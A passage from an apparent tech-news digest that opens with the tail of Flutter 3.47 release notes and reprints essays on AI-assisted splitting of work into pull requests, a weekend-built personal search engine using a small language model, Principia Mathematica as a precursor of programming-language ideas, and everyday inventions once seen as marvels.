  • Support for A2UI's client-side functions, which enable you to provide the agent with functions it can direct the client to use for validation, derived values, and other small tasks without a round trip.

Refining the platform experience

This section highlights targeted improvements contributed by the community and the Flutter team to polish the developer and user experience across all platforms.

Android

On Android, we’ve resolved a virtual keyboard issue where modifier keys (like Shift) could get stuck during events. The key responder now skips physical key synthesis for virtual keyboard inputs, keeping keyboard interactions clean.

Android dependency matrix

To ensure stable builds, Flutter 3.47 is verified against the following Android dependency versions:

  • Java: 17 (minimum required version)
  • Kotlin Gradle Plugin (KGP): 2.4.0
  • Android Gradle Plugin (AGP): 9.1.0 (newest compatible with KGP 2.4.0)
  • Gradle: 9.3.1 (minimum required for AGP 9.1.0)

To ensure your application builds successfully across future releases, we encourage you to use the standard API level variables vended by the Flutter SDK in your build files. For this release, they are configured with the following default values:

  • flutter.compileSdkVersion (API 36)
  • flutter.targetSdkVersion (API 36)
  • flutter.minSdkVersion (API 24)

iOS and macOS

For iOS developers, code signing is now more transparent. Thanks to community member @alex-medinsh, the CLI displays both the Team ID and Team Name when selecting a certificate.

Additionally, community member @mozammal-hossain improved troubleshooting by providing clearer provisioning profile error messages when signing fails.

Desktop

Desktop platforms also received targeted refinements. Caret positioning for Korean text composition is resolved on Windows (thanks to @CHOIgoung), and Windows plugins can now move expensive tasks off the platform thread using FlutterEngine::PostPlatformThreadTask. On Linux, @CodeDoctorDE added stylus rotation and pressure reporting.

Graphics and engine

In the engine, fragment shaders targeting OpenGLES no longer need conditional coordinate flipping when reading textures. This is now handled in the vertex shader. See the OpenGLES render-to-texture breaking change page for more details.

Framework polish

Finally, the framework itself is smoother, with improvements split across key components:

Accessibility and semantics: Android high-contrast and color inversion settings are now detected automatically, thanks to @xxxOVALxxx (MediaQueryData.highContrast and MediaQueryData.invertColors). Nested text spans inside Text.rich now match their layout sequence in the semantics tree, and keyboard focus blocking is added for BlockSemantics.

Android accessibility settings

Android accessibility settings

Text and selection: Text selection handles on mobile now remain stable during minor scrolling, and keyboard shortcuts can now dismiss open selection menus. On Android, selection handles no longer obscure the context menu when positioned near the top of the screen, thanks to @JhonaCodes.

Selection handles overlapping menu Selection handles correctly placed

We also fixed a crash in SelectableRegion when selection began in an empty scrollable container, and resolved visual highlight artifacts on faded selectable text, thanks to @ikramhasan.

Before highlight After highlight

Gestures and scrolling: Improved gesture propagation for native iOS views embedded via platform views. EdgeDraggingAutoScroller now respects the ScrollPhysics of the active scroll view, preventing auto-scrolling on locked lists.

EdgeDraggingAutoScroller demo

EdgeDraggingAutoScroller demo

Core Widget enhancements: Preserve original colors inside ImageIcon with useOriginalColors: true, specify clipping behavior in AnimatedCrossFade, and track image stream errors directly with ImageStreamListener.


Ready to upgrade

The pieces are set, and the foundations are ready. All that's left is to bring these upgrades to your local machine:

flutter upgrade

While your SDK updates in the background, we've got some homework (the fun kind) for you:

  • Meet the Contributors: Grab some popcorn and tune into our new video series, Introducing: Flutter Notable Commits, celebrating the community members who made this release possible.
  • Check the Details: Give the Breaking Changes Page a quick scan so you are prepped for the standalone UI package migrations.

We are excited to see what you all will build with this new and improved version of Flutter!

The Daily Front Page 15 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — Build, Then Edit
article

Build Wide, Ship Narrow

by ashumz·▲ 103 points·30 comments·adapt.com ↗
make your most critical structural decisions at the moment you know the least about the problem

Good engineers plan before they build. The workflow I grew up seeing: write an RFC describing the feature, split it into smaller issues, then build them, each issue often blocking the next. The structure of the work was locked in before a single line of code existed.

This is reasonable. It keeps code reviews manageable and avoids big-bang merges. It also asks you to make your most critical structural decisions at the moment you know the least about the problem.

Before you've built anything, you're guessing: which pieces are separable, how complex each one will be, whether step 3 will force you to rethink step 1. Sometimes you're right. Often you're not, and step 1 gets thrown away. You learned something building it, but you'd have learned it faster by building the whole thing first.

We paid that cost for a good reason: the alternative was building everything and untangling it by hand, and untangling a week of work is harder than planning ahead. Deciding boundaries up front was never about making the build easier. It was about making review possible, and it was the only affordable way to get there. That's the part that changed.

What changed

Three things got dramatically cheaper. Building: an AI assistant turns a clear problem into working code in hours, sometimes minutes. Design: you can interrogate a plan and reshape it at conversation speed. And the one that matters most here, decomposing a finished branch: splitting a week of tangled work into a sequence of small PRs used to be the most tedious part of the job, which is exactly why we avoided it. It's now a prompt.

Two things didn't get cheaper. The first is the judgment half of code review. Agents made the mechanical half (consistency, nits, obvious bugs) nearly free, but they don't settle subtle correctness or the questions around it: does this change belong where it is, will this endpoint shape hurt six months from now. A bot approving your PR isn't the same as you understanding the code, and if you didn't type the code, reading it is how you come to own it. Narrow PRs make that reading possible.

The second is product validation. Running the thing and deciding it's the right thing to build is still slow. What's new is having the whole feature working early enough to show someone before anyone reads a line of it.

So stop pre-deciding boundaries to dodge a cost that no longer exists.

My workflow now looks like this:

  1. Grill the plan until it has real decisions in it
  2. Commit the spec before any code, when the design is novel
  3. Build wide, committing save points as you go
  4. Demo and iterate before anyone reads the code
  5. Split into PRs along the boundaries the code revealed
  6. Merge, cleanup last: pure deletion in its own final PR

Design still goes first

To be clear: this isn't "skip planning and start coding." Before I touch the editor, I have a plan, and every feature starts with an interrogation. I run grill-me, a skill that interviews you about your idea in adversarial rounds until it has real decisions in it. What's the fallback if the API call fails? I run it on everything, including small changes, and it keeps surfacing gaps I didn't know were there.

When the design is novel, the plan becomes a spec committed before any code. On a different project, the first PR was a document: what the feature was, how it would work, where the trust boundaries sat. It merged days before any implementation existed, so the team could push back first.

What never gets committed is a decomposition into PRs. Decide what to build before you build it; decide how to slice it after.

Build wide

A crumpled scratch-paper build branch on one side and a clean fan of five pull requests on the other

Once the design is settled, I build. I often work in steps, but I don't stop at each one to open a PR and wait for review. Everything stays on one branch until it works end to end, across whatever files are in the way.

Commits happen, but they aren't milestones for anyone else. They're save points: a concept is proven, or I'm about to try something risky and want a rope to pull back to. A refactor I finished recently ran to a dozen-plus commits in a single day across dozens of files, with operational messages. Waypoints so I can see where I've been, not a story for a reviewer.

This is the part that makes some engineers uncomfortable, and I understand why: git history is supposed to be the record. But this history never becomes the record. The PRs at the end are cut fresh off main, and the build branch is scratch paper you throw away. Two audiences separated in time, me and the reviewers, and keeping them apart lets you optimize for both.

Demo before anyone reads the code

Once the work is in a good place, I stop and show it. Not as a PR or a code review, but a short video in Slack, or a preview deployment if the change needs clicking. Feedback on working software from the people who will use it, before a single code review starts.

Review is expensive now that the cheap half is automated. Finding out at review time that you built the wrong thing (confusing UI pattern, an endpoint shape that doesn't fit how the frontend uses the data) burns a reviewer's time and your own. A demo catches it while changes are cheap. If it surfaces something that needs rethinking, I run grill-me on the feedback first, so the iteration isn't just vibes.

Ship narrow

One tangled build branch cut into five narrow pull requests, with the deletion PR last

The build order is only a rough draft of the split: the steps get regrouped and re-cut. The deletion PR is the clearest example, a unit that only exists at the end, once the new path is in place.

I run one prompt:

Split the current work into the smallest set of independently reviewable PRs, each safe to merge on its own, and each delivering value to the user whenever the work allows. Create a git worktree and branch off main for each. Stack only where a dependency is real; otherwise branch from main. Any removal of the code being replaced goes in its own final PR. Show me the proposed split before creating anything.

How long it takes depends on how tangled the work is, from a few minutes to a few rounds of back-and-forth. Either way, no manual cherry-picking.

That refactor came out as five PRs: two backend endpoints as siblings off main, two frontend views each sitting on top of the backend PR whose data it needs, and a final PR that was pure deletion of the old path. The deletion removed several hundred more lines than the whole feature added. That's the shape of a refactor done in this order.

Two rules I've arrived at by doing this repeatedly:

Stack only when the dependency is real. A frontend view PR depends on its backend endpoint PR, and the branch reflects that. Everything else comes from main. Stacking for convenience creates a rebase chain you'll regret the moment the bottom PR gets feedback.

Cleanup ships last. The old code dies in its own PR, after the new path is live. Mixing deletion with creation confuses reviewers, makes rollback ambiguous, and buries the cleanup in the noise of the feature.

The split is also when I read my own work. Going through the diff PR by PR, at a size I can hold in my head, is the difference between having shipped AI-written code and understanding it. I'd rather find my own problems there.

One practical note: managing a stack burns context fast, so hand the split work to subagents that report back to a main agent. In Cursor, the split-to-prs skill packages this.

What it bought, what it costs

The heavy PRs stay heavy, and they should. The backend ones carried the real architectural risk (new data models, new API surface, trust boundaries), which is where reviewers should spend their attention. The frontend PRs that consume them read in minutes. Small, focused PRs flow. Large ones sit.

The agent review loop is faster at this scale too. At Adapt, we use Adapt itself as a reviewer, an agent with business context from previous work. It comments within minutes of a PR opening, and the exchange (questions, clarifications, a small fix) resolves in under ten. That only works when a PR is small enough to read quickly; a 2,000-line PR mixing several concerns doesn't get that treatment from a human at all.

Merging incrementally also makes deployments easier to manage. If something breaks, you revert one focused change, and your error tracking points at that change instead of an entire merged stack.

Those are the gains. Two costs come with them.

Rebasing. When a reviewer asks for a change on a PR that another sits on, every branch above it needs rebasing. It doesn't happen often, since reviewers usually touch leaf PRs, but when it does you feel it. Keep the chat session that produced the split open: it still holds the split, so you can re-prompt it to update the branches above instead of doing it by hand.

Splitting is not shipping. As I write this, all five PRs from that refactor are still open. A good split makes each PR easy to review and worth merging on its own. An agent does the first for me; the second is my call when I decide what goes in each PR, and my team's when they decide what to merge. Mine sat because I only did the first. Even if all five merge on the same day I keep the review benefit and a clean revert target per change; what I lose is incremental delivery, since nothing reached a user earlier and the deploys land as one batch.

When to reach for it

Good fit: multi-surface features crossing backend and frontend, refactors where you don't know the final shape until you've done it, any work where you'd otherwise be guessing at issue boundaries.

Harder fit: migrations and schema changes that must be sequenced in production, where the ordering is real and you should plan it first. Work that has one obvious place to cut. Features where step 1 cannot ship alone, ever; if everything lands at once, late decomposition buys you incremental review and nothing more.

The heuristic: if you're writing an RFC and guessing at how to break it into issues before you've built anything, that time is probably better spent building. You'll have better answers at the end. I've been testing this across a few projects and it has held up.

The structural decision doesn't go away. It just gets much cheaper when you make it with the code already in front of you.

The Daily Front Page 16 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — The Small Web Search
article

I built a 500k-domain search engine for makers in a weekend for $10

by dreamforever·▲ 139 points·78 comments·alexmorleyfinch.github.io ↗
I want to make a search engine for myself only.

Sunday, 2am. I couldn’t sleep and I was annoyed at search engines again. Every query I actually cared about, portfolios, zines, weird little art projects, one-person software, drowned under a foot of corporate documentation and SEO sludge. So I did the thing you do at 2am: I opened a terminal and typed out a plan.

“I want to make a search engine for myself only. There are 40-ish million domains. We can store a bit of metadata about each one. Even with 1KB each that’s 40GB, which is doable.”

By Wednesday lunch I had 560,183 homepages catalogued, an empty queue of anything worth fetching next, and a decision to stop. This is the story of that weekend: what I built, what broke, what it cost, and what I’d tell you if you wanted to build your own.

The headline, if you only read one paragraph: for about $10, an overnight GPU rental, and a few hours of steering the thing while it ran, you can have a personal search index of a few hundred thousand sites, under a gigabyte on disk. That’s the whole pitch. Everything below is how I got there and where the sharp edges are.

Full technical details are provided separately.

Search UI — query “Research”

What I was actually trying to build

Not “index the web.” Just: find people doing stuff, art, code, hardware, poetry, little theatres, and not drown in docs.company.com. Personal, single user, no accounts. A crawler that only ever looks at homepages, a small local language model that reads each one and writes a name, two or three sentences, a category, and a handful of tags. A little search UI on top with fuzzy matching so I could type half a word and still find the right site.

I wrote down what I was explicitly not building, mostly so that agents helping me wouldn’t quietly “simplify” it into something bigger: no IP scanning, no Redis, no storing full page HTML, no recrawl scheduler, nothing multi-tenant. Ignore was just a checkbox on a category, applied at search time. The crawler still summarised ecommerce sites, I just didn’t have to look at them.

The napkin math was tens of millions of domains at roughly 1KB of metadata each, which is genuinely nothing for a Postgres box. Page text itself was never meant to be a corpus, just a scratch buffer that gets thrown away the moment the model is done with it.

The machine

Four processes, three of them on my own PC, one rented GPU that never touches the database directly:

  • A fetcher. Grabs a pending domain, tries HTTPS then HTTP, pulls the title, body text, and outbound links with a simple HTML parser, no JavaScript execution. Sets the row to “ready.”
  • A worker. Grabs a ready domain, skips the model entirely if the page is empty, parked, or a bot-challenge wall, otherwise makes one structured request to a small local model (Gemma, 4B parameters) and gets back a name, summary, category, and tags. Wipes the scratch text, enqueues the outbound links at a priority based on what kind of page they came from.
  • A steward. This one doesn’t touch the main queue at all. It samples domains from hosts that are producing suspiciously many pages, asks the model “block, keep, or unsure,” and quietly maintains a blocklist. More on why I needed this later.
  • An API and a tiny web UI. Search with filters, a page to toggle which categories are hidden, and a dashboard so I could actually see what the factory was doing instead of squinting at logs.

Dashboard — pipeline, categories, Postgres size

Everything the fetcher grabs lives directly on the domain’s own database row while it’s “in progress.” Once the model is done with it, that text gets wiped. That matters more than it sounds, because at any real scale you cannot let raw page text pile up forever. Forty million rows times a few kilobytes each adds up fast, and I only needed that text for the few seconds the model was reading it.

The web is 90% corporate, actually

The first version worked within a couple hours. Point it at a sample of domains, watch things get summarised, search for them. Great. Then, Sunday afternoon, I looked at what had actually been catalogued and it was the wrong web. Over 90% corporate sites and documentation. My seed list was skewed and the crawler had no opinions about what to chase next.

The fix wasn’t to block anything. Blocking felt tempting but wrong, because a boring corporate docs page might still link out to someone’s personal blog, and I didn’t want to lose that. Instead I weighted the queue: pages classified as “portfolio” or “zine” or “software” push their outbound links way up the priority list, pages classified as “corporate” or “docs” push theirs down. One text file, category-priority.txt, became the steering wheel for the rest of the weekend. I’d tune a number, watch what came in over the next hour, tune again.

That same afternoon I wiped the database twice because the quality was bad enough to just start over. Two bugs stood out:

One site’s summary field just said “academic-profile,” a category label the model had shoved into the wrong slot. Fix: treat a suspiciously short summary as a failure and retry once with a stricter prompt.

Another site, a GoDaddy domain-parking page with basically no real HTML, got summarised by the model as being “for the furry community.” but it had just seen the word “furry” in the hostname, with empty body, and invented an entire fandom site out of nothing. That one taught me the actual rule: trust visible text over the title, trust the title over anything guessed from the domain name, and if a page is near-empty or clearly parked, don’t even bother asking the model, just mark it and move on.

Sunday night: Tumblr is not the web

By evening the crawl had a new problem. Tumblr and Neocities blogs were showing up in such volume that they were going to become the entire index. My first instinct was to block them, which felt wrong, because Neocities specifically is exactly the aesthetic I was hunting for. The actual fix was a cap: allow the main domain always, but once a given root domain has produced more than 100 subdomains, stop enqueueing new ones from it. One pass of that rule deleted over 45,000 queued pages instantly. Tumblr still ended up contributing over 9,000 pages to the final index, since the cap only applies going forward, but it stopped being the whole story.

This was also the night the actual purpose came into focus, less “index everything,” more “find the people making things for a community.” I reseeded the crawl with about ten deliberately chosen doors: tilde communities, small independent blogging platforms, a webring or two. Almost the entire final index traces back to links found from those ten seeds, not from the seed list itself.

Family share over time — Tumblr / Neocities / Blogspot

Monday morning brought a related flavor of the same problem: forum farms and Chinese B2B vendor microsites riding a “forum” category boost into a black hole of near-identical pages. Same lesson, different category. I demoted “forum” hard and started keeping an explicit blocklist file for known mills.

Renting a GPU, badly, then well

My own GPU, a consumer card, could summarise roughly one page per second running locally. Fine for building the prompt, hopeless for actually filling an index. So I rented a cloud GPU to run the same small model at real concurrency, and this is where most of my actual debugging time went, none of it about the AI itself.

The short version: my first rental setup used a wrapper library that insisted on spinning up a distributed compute framework even for a single GPU, and that framework fought with the host machine for CPU time. I was paying for a GPU and getting throttled by CPU contention I never asked for. Threw that away, ran the plain open source inference server instead, no wrapper. Hit a crash on cold start at high concurrency, which turned out to be a memory spike during the first batch, not a steady-state problem, fixed by ramping concurrency up gradually instead of slamming it at full speed from a cold start.

The machine that actually did the job was a mid-range workstation GPU with a full, unshared set of CPU cores attached. That distinction, a dedicated CPU slice versus an impressively named but shared one, may have mattered more than the GPU model itself. Sustained throughput on that box was around 600 summaries a minute, at a rental cost of about thirty five cents an hour. That’s roughly a dollar to catalogue a hundred thousand sites.

Ballpark napkin math at those rates, assuming you can keep the GPUs fed and they scale roughly linearly. Renting two or three GPUs costs about the same for a given milestone, because each one runs for less wall-clock time; you mostly buy days back:

Sites Approx. cost 1 GPU 2 GPUs 3 GPUs 10k ~$0.10 ~17 min ~8 min ~6 min 100k ~$1 ~3 hrs ~1.5 hrs ~1 hr 1M ~$10 ~1.2 days ~14 hrs ~9 hrs 10M ~$100 ~12 days ~6 days ~4 days

Those figures lean on the best of the three setups I actually tried. Sustained throughput across them looked like this:

Observed throughput across three GPU setups

  • The 4090 run used the Vast.ai / vLLM wrapper with the CPU pegged — GPU underutilised. The PRO 4500 numbers are the plain vLLM setup with a dedicated CPU slice.

The GPU/CPU utilisation data came from the servers own management UI, where I noticed CPU was +90% while GPU was between 30-50%. I never benchmarked the GPU/CPU on the RTX PRO 4500 because it was an overnight run just for clearing the priority queue and wrapping things up. I got the token throughput values from the server logs. Hour by hour, the weekend looked quiet for most of Monday and Tuesday, then the good box held near 600 pages a minute until the queue was empty:

Weekend completion rate — done pages per minute

Inventing a second worker at midnight

Late Monday night, staring at the crawl still running, I asked myself something like: at this scale I can’t manually watch for bad spirals, could I have a second small process sample five, then ten, completed pages from any domain that’s producing suspiciously many, and ask the model itself whether to block it?

That became the steward, and it’s the single addition that let the index grow from around 65,000 pages to 560,000 without me babysitting it. It sat on the same local card and LM Studio I’d used for prompt work, so spiral judgements never competed with the rented GPU that was filling the index. Over the run it blocked 177 problem domains on its own, almost entirely hotel and booking mills, and correctly left alone things like universities and legitimate large platforms that just happen to have a lot of subdomains.

What the numbers actually looked like

Index snapshots — Sunday evening through Wednesday noon (UTC)

Watching this over four days was genuinely the fun part. Early on, blogs and personal sites made up over half the index. That was mostly Tumblr and Neocities flooding in. By the end that share had dropped to about 12%. Not because I found fewer personal sites. I found more of everything, but the crawl matured into a much broader mix: nonprofits, community sites, software projects, magazines, museums, podcasts.

The nonprofit category alone ended with almost 27,000 real organisations. I spot checked a sample and it’s genuinely full of things like food banks, wildlife charities, and civic groups. That’s the kind of result that makes the weekend feel worth it, a category I barely thought about at the start turning into one of the strongest parts of the index.

Eventually the prioritised categories ran dry and the crawler started clearing the zero-priority backlog, the stuff that had been queued the whole time but never bubbled up. That backlog is a fair cross-section of the raw internet with none of the curation. So right on schedule, once nothing was left to prioritise ahead of it, the model started cataloguing a wave of adult sites.

Roughly 15% of everything crawled ended up as “empty,” meaning the page was either a bare JavaScript shell my simple HTML parser couldn’t see through, or a bot-detection wall. I never built a fallback that actually renders JavaScript, on purpose, since it would have meant running a full browser at scale, which is a different and much more expensive project. Some of the most aesthetically perfect sites for what I was hunting for are sitting in that empty bucket right now, which stings a little, but was the right tradeoff for a weekend budget.

The part that will actually bite you at scale

If you try this yourself, the crawling and the GPU renting are the fun, satisfying parts. The part that quietly becomes a mess is category and tag handling. I let the model invent its own category and tag names freely, on the theory that it would teach me the taxonomy instead of me guessing one upfront. That was the right call for getting started fast. It also means I ended up with 671 distinct categories, many used exactly once, and over 121,000 tags, more than half used only a single time, mostly because the model spells things slightly differently call to call. I wrote a manual merge tool to clean the worst of it up by hand. That does not scale past a hobby project. If you’re building something bigger than a weekend index, decide up front whether you’re going to constrain the model to a fixed list of categories or budget real time for cleanup, because “just let the model freestyle” catches up with you fast.

The other genuine scaling issue is prompt and crawl steering itself. None of the fixes above came from a clever one-shot prompt. They came from watching production data at several points over the weekend and nudging weights, one file, a handful of numbers, based on what the crawl was actually doing. That loop, look at real output, adjust one lever, watch again, did more work than any amount of upfront planning would have.

So, should you build one

If you want a search engine that only returns the kind of thing you actually go looking for, yes, I think this is very doable in a weekend, and cheap enough that the GPU bill isn’t the reason not to try. The rough shape that worked for me: split fetching from summarising so a slow network connection never leaves an expensive GPU idle, weight your crawl queue instead of hard-blocking categories you don’t want yet, cap subdomains instead of banning whole platforms, skip the model entirely on empty or parked pages, and build some kind of automated sink-detector once you’re past the size where you can eyeball the incoming pages yourself.

I’m not planning to host or release my own production database, at least not right now, so I can’t hand you my 560,000 sites directly. But the code is going up as open source, so you can point your own crawl wherever your own curiosity leads.

Repo: Marlin - from Finding Nemo, on a search accross the ocean

Search UI — query “Art”

The Daily Front Page 17 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — Logic’s Long Shadow
article

Principia Mathematica is modern and insightful

by matt_d·▲ 272 points·148 comments·okmij.org ↗
Principia discusses, with great insight, such modern topics as extensionality/intensionality, referential transparency, type.

Introduction

Principia Mathematica by Whitehead and Russell was published back in 1910 -- and yet it reads like a modern text on programming languages. I have found Principia quite engaging and hard to put away. Principia discusses, with great insight, such modern topics as extensionality/intensionality, referential transparency, type. It contains perhaps the first mentioning of `domain', `alpha renaming' and `type' in the modern sense. Its `incomplete symbols' -- the ones that only make sense in a context -- anticipate continuations and control operators. It insightfully observes that the notions of free and bound variables, substitution, abstraction, and application all come from linguistics. I could not help but feel that Principia already contained lambda-calculus. It also seems that Russell and Whitehead anticipated intuitionism, for example, when insisting on separate notations for 'any' vs. `all' (although admitting the equivalence of these notions in their theory).

The whole Principia is very large: It is said that the book is famous for taking a thousand pages to prove that 1+1=2. As the preface stresses, the proofs are excruciatingly detailed so to remove the chance of an unstated premise being used in a proof. The goal of Principia was to put forward a set of very basic notions, and show that they and they alone are sufficient for the whole Mathematics. If Principia were to be published today, all the proofs would be relegated to a Supplement (or a theorem prover). What important are the basic notions and the set up -- most of which is explained in the Preface and Chapter 1.

These following are a few notes taken while reading Chapter 1 of Principia, with several comments very kindly given by Jacques Carette.

References

Principia Mathematica by Alfred North Whitehead and Bertrand Russell. Cambridge: University Press, 1910-
<http://name.umdl.umich.edu/AAT3201.0001.001>
The full scanned text, many thanks to The University of Michigan Historical Mathematics Collection

Linsky, Bernard. The Notation in Principia Mathematica
The Stanford Encyclopedia of Philosophy (Summer 2026 Edition), Edward N. Zalta & Uri Nodelman (eds.)
<https://plato.stanford.edu/archives/sum2026/entries/pm-notation/>

Referential transparency, extensionality

Page 8 of Principia has perhaps the first mention in mathematical literature of intensions and extensions, and what is now called `referential transparency': ``if p≡q we shall have f(p)≡f(q)''. Here f(p) is a proposition that includes another proposition p. In modern terms, we would call f a context and denote by C[], and say that if p≡q then C[p]≡C[q], which is the familiar statement of a referential transparent context. The page then shows an example of a non-referentially transparent context ``A believes p'': a proposition whose meaning varies when p is substituted with equivalent propositions. The example betrays the origin of this concept, from linguistics, specifically, from the work of Frege (who is mentioned in a footnote). The book states that ``mathematics is always concerned with extensions rather than intensions.'' (again borrowing Frege terms, but in English translation.)

Definitions: a mere typographic convenience of most importance

On p12, the book states that definitions are merely typographic conveniences. On the other hand, definitions are of most importance, because they show the intent.

…the definitions are not part of our subject, but are, strictly speaking, mere typographical conveniences.… In spite of the fact that definitions are theoretically superfluous, it is nevertheless true that they often convey more important information than is contained in the propositions in which they are used. … The collection of definitions embodies our choice of subjects and our judgement as to what is most important. Secondly, … the definition contains an analysis of a common idea, and may therefore express a notable advance.

Propositional functions: anticipation of lambda-calculus

Page 15 introduces ``propositional functions'', what is now known as lambda-terms. See for yourself, from the running example on the page.

"x is hurt" [called ambiguous] really makes no assertion at all, till we have settled who x is. Yet owing to the individuality retained by the ambiguous variable x, it is an ambiguous example from the collection of propositions arrived at by giving all possible determinations to x in "x is hurt" which yield a proposition, true or false.

The authors then introduce the notation for that ``propositional function'': "\hat{x} is hurt". Although "x is hurt" and "y is hurt" occurring in the same context can be distinguished, ``"\hat{x} is hurt" and "\hat{y} is hurt" convey no distinction of meaning at all.'' The paragraph concludes: ``More generally, φx is an ambiguous value of the propositional function φ\hat{x}, and when a definite signification a is substituted for x, φa is an unambiguous value of φ\hat{x}.'' Here we have it: free variables, bound variables, substitution and alpha-equivalence.

The topic of variables comes up again, on p17, in the discussion of quantified formulas:

The symbol "(x).φx" [in modern notation, ∀x.φ(x)] denotes one definite proposition, and there is no distinction in meaning between "(x).φx" and "(y).φy" when they occur in the same context. … The symbol "(x).φx" has some analogy to the symbol ∫abφ(x) dx since in neither case is the expression a function of x. … The x which occurs in "(x).φx" or "(∃x).φx" is called (following Peano) an "apparent variable".

The page then goes on to introduce the notion of a variable scope.

What Principia calls `apparent variable' is bound variable in modern terminology; `real variable' is now called free variable. The example of a definite integral to illustrate bound variables and alpha-equivalence is striking. It also shows that lambda calculus has a long pedigree. I couldn't help but admire the Leibniz insight.

for any vs for all: a glimpse of Intuitionism

p18 and p19 of Principia deals with what we now call schematic variables and schematic assertions, of the form ⊢ f x.

When we assert something containing a real variable, as in e.g. ⊢ x = x we are asserting any value of the propositional function. When we assert something containing an apparent variable, as in ⊢ (x).x = x [which is ⊢ ∀ x. x=x in modern notation] we are asserting ... all values of the proposition function in question. It is plain that we can only assert ``any value'' if all values are true; for otherwise, since the value of the variable remains to be determined, it might be so determined as to give a false proposition. Thus in the above instance, since we have ⊢ x = x we may infer ⊢ (x).x = x

The authors then go on to introduce what we now call generalization, of ∀-introduction. (Page 20 introduces the inverse, ∀-elimination, or, as Principia puts it, ``what holds for all, holds for any''.)

Although a schematic formula (for any) is equivalent to the corresponding universally quantified formula in Principia's logic [which was later distilled to is now called First-Order Logic], the authors still wish to keep the two notions distinct.

The ordinary formulae of mathematics contain such [real-variable] assertions; for example sin² x + cos² x = 1 does not assert this or that particular case of the formula, nor does it assert that the formula holds for all possible values of x, although this is equivalent to this latter assertion; it simply asserts that the formula holds, leaving x wholly undetermined; and it is able to do this legitimately, because however x is determined, a true proposition results.

Intuitionistic view on existence

On page 20, Principia says, after describing ∃-introduction: ⊢ φy ⊂ (∃x).φx:

The above proposition gives what is in practice the only way of proving existence theorems: we always have to find some particular y for which φy holds, and hence to infer (∃x).φx. If we were to assume what is called the multiplicative axiom, or the equivalent axiom enunciated by Zermello, that would, in an important class of cases, give an existence-theorem where no particular instance of truth can be found.

Thus, for Russell and Whitehead, ``the only way in practice'' of proving existence theorems was to exhibit a witness. They have, perhaps unconsciously, took up intuitionistic, or even constructivist view. And this was published in 1910...

Jacques Carette noted that Brouwer was also publishing around that time. (Although it has to be said that Brouwer writings of that time were hardly comprehensible to a mathematician. The intuitionistic vs. classical controversy has really started with Hermann Weyl.) Jacques has further noted that some aspects of that constructivism can be traced back Kronecker 30 years earlier.

Types

On p21, after asserting a proposition (in modern notation)

    ⊢ ∀x. φ(x) ∧ ∀x. ψ(x)   ⇒   ∀x. φ(x) ∧ ψ(x)

the authors write ``this requires φ and ψ should be functions which take arguments of the same type. (We shall explain this requirement at a later stage).'' How contemporary! That was perhaps the first use of the word `type' in the sense now so common in programming.

Origin of set-membership

On p26, the authors note that the symbol for set membership is actually the Greek epsilon, the first letter of the word ἐστί -- which, by a Russian analogue, I assume means ``to be''. So x ∈ man literally means "x is a man". (I don't mean that Principia first proposed that notation. It was already established.)

Descriptive functions

Page 33 is probably the first modern definition of a function as a particular form of a binary relation: any binary relation R induces a function R'y as the unique x such that xRy holds. No restriction on R is imposed; however, later `domain' is introduced as a class of those y for which there exists only one x so that xRy holds. A one-to-many relation hence does define a function, with the empty domain.

Principia calls such binary-relation--induced functions `descriptive functions' (now often called ``definite descriptions''). The name and the exposition follows the theory of descriptions in natural languages that Russell developed five years prior (in his famous paper ``On denoting'', Mind 14(4), 1905).

Jacques Carette noted that Principia anticipated the difference between ``definite description'' and ``explicit function'' back in 1910, because there were already examples in mathematics of these. ``Analytic continuation is one of those processes in mathematics which is functional but not a function, as it involves a certain amount of choice.''

References

Ludlow, Peter. Descriptions
The Stanford Encyclopedia of Philosophy (Winter 2023 Edition), Edward N. Zalta & Uri Nodelman (eds.)
<https://plato.stanford.edu/archives/win2023/entries/descriptions/>

The Daily Front Page 18 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — The Everyday Miracle
article

Ordinary Abundance

by yen223·▲ 265 points·136 comments·ordinaryabundance.com ↗
A modern apartment is full of things that once drew the same kind of awe.

Edward Bellamy once imagined that music on demand would be "the limit of human felicity." A modern apartment is full of things that once drew the same kind of awe.

Stories of everyday objects

The sitting room

It’s eight o’clock. The apartment is quiet, aside from the music playing softly over the speaker. It’s a playlist your friend made for you years ago. You send them a text to check in, then pick up a book, flick on the lamp, and settle into the chair to read.

Any song, at home

If we could have devised an arrangement for providing everybody with music in their homes, perfect in quality, unlimited in quantity, suited to every mood, and beginning and ceasing at will, we should have considered the limit of human felicity already attained.

Edward Bellamy, 1888 — From Looking Backward, his utopian novel set in the year 2000. Before recordings, listening to music meant having instruments or performers nearby, and favorite songs could go unheard for years at a time.

Light without fire

The people, almost with bated breath, stood overwhelmed with awe, as if in the presence of the supernatural. The strange, weird light, exceeded in power only by the sun, yet mild as moonlight, rendered the Court House square as light as midday.

A witness at Wabash, Indiana, 1880 — The night Wabash, Indiana became one of the first cities lit entirely by electric light. Candles, oil lamps, and gas jets gave relatively feeble light, and were all smoky open fires inside the home.

A museum on the wall

A museum without walls has been opened to us, and it will carry infinitely farther that limited revelation of the world of art which the real museums offer us within their walls.

André Malraux, 1947 — Le Musée imaginaire, later translated as Museum Without Walls. Before reliable reproduction, most people saw major artworks only by visiting churches, collections, or museums.

Memories kept

The very shadow of the person lying there fixed for ever! ... I would rather have such a memorial of one I dearly loved, than the noblest artist's work ever produced.

Elizabeth Barrett Browning, 1843 — On first seeing a daguerreotype, in a letter to Mary Russell Mitford. Preserving a likeness used to require a painted portrait; many families had no accurate image of relatives who died.

Reading after the eyes fail

It is not twenty years since there was discovered the art of making spectacles ... one of the best and most necessary in the world. I myself saw the man who discovered it, and I talked with him.

Friar Giordano da Pisa, 1306 — A sermon at Santa Maria Novella, Florence. Age-related vision loss was common, and before spectacles it could end reading and other close work.

Distant messaging

Of all the marvellous achievements of modern science, the Electric Telegraph is transcendently the greatest and most serviceable to mankind. It is a perpetual miracle, which no familiarity can render commonplace.

Briggs & Maverick, 1858 — The Story of the Telegraph. For most of history, messages traveled only as fast as the person who carried them. Receiving a reply from far away could take weeks or months.

Books unchained

A great good, and almost a divine benefit to the world.

Jakob Wimpfeling, 1505 — The German humanist, on the new art of printing. A hand-copied book was valuable enough that libraries chained theirs to the reading desks.

The kitchen

